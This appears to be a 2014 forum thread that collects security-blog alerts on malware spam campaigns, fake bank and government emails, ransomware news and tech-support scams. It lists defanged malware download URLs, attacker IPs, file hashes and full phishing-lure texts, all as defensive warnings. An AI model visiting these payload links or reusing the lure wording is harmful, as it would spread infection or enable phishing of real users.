FYI...

Fake Google drive SPAM - PDF malware
- http://myonlinesecurity.co.uk/grady-murphy-shared-google-drive3623019-73-malware/
13 Aug 2014 - "Grady Murphy shared Google Drive:3623019-73 to submit@ < your email address>.pretending to come from Grady Murphy < random name that matches the name inside the email> , Apps Team is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this email leading to different infection sites and links, The names of the alleged Google Drive owner who wants to share with you changes with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
Confirm request
Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/

13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/28fd5d98d57d2289edfc3a327f7b9f493d4fc58c51a70cfbbd6b3474f7c65f68/analysis/1407913490/

178.238.236.109: https://www.virustotal.com/en/ip-address/178.238.236.109/information/
___

Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecurity.co.uk/order-id-769019-purelygadgets-com-word-doc-malware-malware/
13 Aug 2013 - "Order id 769019 | PurelyGadgets .com pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German language and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of word. On previewing it, or opening it in Word 2013 ( which has macros disabled by default ) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...

13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/3d53b54d98e14f9de2a2316fe09ee6b9fe27f2dacdd4ad85f52dd1e16eebb006/analysis/1407936811/
___

UK Land Registry Spam
- http://threattrack.tumblr.com/post/94637538213/uk-land-registry-spam
Aug 13, 2014 - "Subjects Seen:
Notification of direct debit of fees
Typical e-mail details:
Notification Number: 4682787
Mandate Number: LND4682787
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry

Malicious File Name and MD5:
LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8c26e0fcb0496b40853e9589e35632c0/tumblr_inline_na95u2Ihd01r6pupn.png

Tagged: UK Land Registry, Upatre

:fear: :mad: :sad:

FYI...

Fake Citicorp SPAM – PDF malware
- http://myonlinesecurity.co.uk/citicorp-mail-report-attached-fake-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk .com

14 August 2014 Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54* . This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0875c59c8f7c69befb7dce934db7c9652614a9ad90cabc37721f56114bb026f0/analysis/1408010403/
___

Fake Charity Trends SPAM ...
- http://blog.mxlab.eu/2014/08/14/backdoor-bot-ed-attached-to-emails-with-subject-like-oder-invoice-9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is send from the spoofed address and has the following body:

Dear *******@*******.co.uk,
Please find attached invoice #9156230_08 from 13/08/2014.
Thanks!
Reyes Mcdaniel .
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx

The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/4ac7416ea64789afabee6c7ff152cf4c552c303baef009270adca11238667bc4/analysis/1408011038/

- http://blog.mxlab.eu/2014/08/14/fake-charity-trends-email-regarding-donation-contains-trojan/
Aug 14, 2014 - "... intercept a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is send from the spoofed address and has the following body:

Charity Trends®
Dear *******@*******.com,
Thank you for your generous donation of 2623 GBP, which we received today.
Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
You will find all information about your donation in zip archive.You are making a difference!
Thanks again for your kindness,
Elsa Nash ...

The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Indside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustotal.com/en/file/3158101b5a61094a960bc3e4a17240c153efa8cbb6b1eaa26e6d2ab6c06cafe9/analysis/1408011666/
___

Fake Citibank SPAM - PDF malware
- http://myonlinesecurity.co.uk/citibank-re-account-documents-uploaded-fake-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents' have been uploaded pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like"
citibank .com
RE: Account Documents
To: <REDACTED>
Case: C4055427
Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...

14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54* . This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/110dc2cdabc3ffcc924312b44e025072ec2641bf55bdcc8abdc426ddd9e8eced/analysis/1408029154/
___

ZeroLocker
- http://www.webroot.com/blog/2014/08/14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older crpytolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional​ red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot.com/blog/wp-content/uploads/2014/08/blograrw.bmp
This newest edition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI untill all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___

Suspicious login message Faked, distributes Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/suspicious-login-message-faked-distributes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login2.png
... while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised- website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___

Beware of Risky Ads on Tumblr
- https://blog.malwarebytes.org/malvertising-2/2014/08/beware-of-risky-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.

dailynewsz[dot]tumblr[dot]com

We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dailynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=yllix.com/

** http://labs.sucuri.net/?blacklist=yllix.com

*** https://www.mywot.com/en/scorecard/yllix.com

:fear::fear: :mad:

FYI...

Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu/2014/08/15/fake-email-transaction-completed-from-barclays-contains-trojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is send from the spoofed address “Barclays.NET” <support@ barclays .net>” and has the following body:
Transaction is completed. 8678 GBP has been successfully transfered.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Barclays.Net 2013 Corporation. All rights reserved.

The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB large file Payment receipt 8821991.exe (note: file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/baa52d35dd98c788729f661c9c9d7b4053fcbdb3083943b9d517b83fe38063a6/analysis/1408097500/
___

Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu/2014/08/15/fake-email-from-voip-inc-installs-trojan-downloader-using-word-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality from Word. This email is send from the spoofed addresses and has the following body:
Thank you for ordering from VOIP Inc.
This message is to inform you that your order has been received and is currently being processed.
Your order reference is 488910845598.
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
You have chosen to pay by credit card. Your card will be charged for the amount
of 805.74 USD and “VOIP Inc.”
will appear next to the charge on your statement.
Your purchase information appears below in the file.

The attached ZIP file has the name Order.zip and contains the 41 kB large file Order.Doc. The Order.Doc is a genuine Word document but the file contains a malicious macro feature. Once opening the Word document, instructions are given on how to enable the content and activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines did detect the trojan downloader at Virus Total*..."
* https://www.virustotal.com/en/file/af8694825d3d7eb470255b9dd858e6544ac54df9295bb373bc8205e8fe27722c/analysis/1408099896/

:mad: :fear::fear:

FYI...

Fake Companies House Spam
- http://threattrack.tumblr.com/post/95187807503/companies-house-annual-return-spam
Aug 19, 2014 - "Subjects Seen:
(AR01) Annual Return received
Typical e-mail details:
Thank you for completing a submission Reference # (9586474).
(AR01) Annual Return
Your unique submission number is 9586474
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.

Malicious File Name and MD5:
AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/342609410f7d088e77e269adf8ed8b38/tumblr_inline_nak1zyZubX1r6pupn.png

Tagged: Companies House, Upatre
___

JPMorgan Chase Secure Message Spam
- http://threattrack.tumblr.com/post/95215399913/jpmorgan-chase-secure-message-spam
Aug 19, 2014 - "Subjects Seen:
Daily Report - August 19, 2014
Typical e-mail details:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.

Malicious URLs:
192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe

Malicious File Name and MD5:
message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
Java_update.exe (38d75db0a575891506b1ff0484a03cd0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/332320ce00484e282636a9e2d20b0764/tumblr_inline_naklp7JVOT1r6pupn.png

192.241.124.71: https://www.virustotal.com/en/ip-address/192.241.124.71/information/

Tagged: JPMorgan, Chase, Dyreza
___

- http://myonlinesecurity.co.uk/jpmorgan-chase-co-daily-report-august-19-2014-malware/
Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014.png

... the html attachment that comes with the email l0oks like the below and clicking the link hidden behind the Click to read message button leads to a fake Java_update.exe
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014_2.png
Todays Date: Java_update.exe .. Current Virus total detections: 5/53*
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/003529bb37382ad19d22b39d3295e297220c21d59418eb1b861ac3a7fb012a96/analysis/
___

Fake Evernote extension serves Ads
- https://blog.malwarebytes.org/intelligence/2014/08/fake-evernote-extension-serves-advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/chrome_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/evernote.png
Clicking “Visit website” directs the user to the chrome webstore page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote log in screen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/fake_evernote_chrome_store.png
On the surface, it may seem like the pop ups and advertisements are coming from the websites themselves, but are in fact from the fake Evernote web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
* https://www.virustotal.com/en/file/6a15febcf9a963a2c5122a71d690b5987f78d59b7e9bc5f28f991ce53043fbf4/analysis/
___

Fake Scotiabank SPAM – PDF malware
- http://myonlinesecurity.co.uk/scotiabank-new-instructions-international-local-transfers-fake-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear Clients
Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
We take this opportunity to inform you that the operations of International Transfers can be made ​​via our internet platform banking the need to complete these types of forms.
Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...

18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52* . This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2d844bbc8af9af835423ef9d862d86eac7f2f07812c0e0b263124de9e9d98b68/analysis/1408393889/

:mad: :fear:

FYI...

Cryptolocker flogged on YouTube
- http://www.theregister.co.uk/2014/08/20/cryptolocker_flogged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo who will present at the upcoming Virus Bulletin 2014 conference in Seattle wrote in a paper advertisement networks was a viable way to flog virus and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.uk/2014/08/19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victim pay up to $500 in BitCoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.uk/2014/08/19/fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attackers' code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregister.co.uk/2014/08/11/cryptowall_malvertising_yahoo_ad_network/

> https://www.virusbtn.com/conference/vb2014/abstracts/KashyapKotovNavaraj.xml
___

Fake Order SPAM – PDF malware
- http://myonlinesecurity.co.uk/order-pdf-malware/
20 Aug 2014 - "'Order – PDF' which comes as an email with a subject of order-6539-8.20.2014.pdf ( where the number is random & the date changes daily is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf ( the number is random ) They appear to come from a load of common first names with weird characters form the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
Today’s version although it pretends to be a PDF file is actually a zip file that probably either use some unknown exploit to extract it or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for pdf is : 2/50* . Current Virus total detections for the extracted .exe : 2/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f84c3bb9f4dcb2961193ad4cdbcd7e882a14f0e19a5f8f68c8aa8c5bd73ba7e0/analysis/1408523288/

** https://www.virustotal.com/en/file/3e135db147e93080de32d3bc5eb27049dec5542493062cc2c7e338d901ddf559/analysis/1408523722/
___

'Reveton' ransomware adds powerful password stealer
- https://www.computerworld.com/s/article/9250503/_Reveton_ransomware_adds_powerful_password_stealer
Aug 20, 2014 - ""A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.com/2014/08/19/reveton-ransomware-has-dangerously-evolved/

** http://blog.trendmicro.com/trendlabs-security-intelligence/key-figure-in-police-ransomware-activity-nabbed-2/
___

Linux Trojan makes the jump to Windows
- http://www.theinquirer.net/inquirer/news/2361245/chinese-linux-trojan-makes-the-jump-to-windows
Aug 20 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.com/show/?i=5760&c=23&lng=en&p=1

** http://news.drweb.com/show/?i=5903&lng=en&c=14

*** https://projectshield.withgoogle.com/en/

:mad::mad: :fear:

FYI...

Tech Support SCAMS rip big brand security software with fake warnings
- https://blog.malwarebytes.org/fraud-scam/2014/08/tech-support-scammers-rip-big-brand-security-software-with-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware product on the market, watch out before you click.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/listAVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)

wefixbrowsers .com / 23.91.123.204: https://www.virustotal.com/en/ip-address/23.91.123.204/information/

onlineinstanthelp .com / 118.139.186.35: https://www.virustotal.com/en/ip-address/118.139.186.35/information/
___

Fake HMRC SPAM - malware
- http://myonlinesecurity.co.uk/helping-business-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Helping-your-Business-onile.png

21 August 2014 Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
... targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/050eae9a0470d35275c74159872ddf4232430ec6890b3d411769e2622c0183f8/analysis/1408620337/
___

Fake Credit reference SPAM - word Doc malware
- http://myonlinesecurity.co.uk/re-credit-reference-file-request-108278994-fake-word-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear <REDACTED>
You have obtain a copy of your credit reference file.
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
Lynn Buck.

21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4326821ac04b6e7d4c36093065b01e7d2ea6931818532c01a5988d2782110aaf/analysis/1408613742/
___

JPMorgan customers targeted in phishing campaign
- http://www.reuters.com/article/2014/08/21/us-cybercrime-jpmorgan-spam-idUSKBN0GL20R20140821
Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
* http://blog.malcovery.com/blog/dyre-banking-trojan-what-you-need-to-know

> https://www.brainyquote.com/quotes/quotes/b/benjaminfr122731.html
"Distrust and caution are the parents of security" - Ben Franklin

:mad: :fear::fear:

FYI...

WordPress attacks exploiting XMLRPC
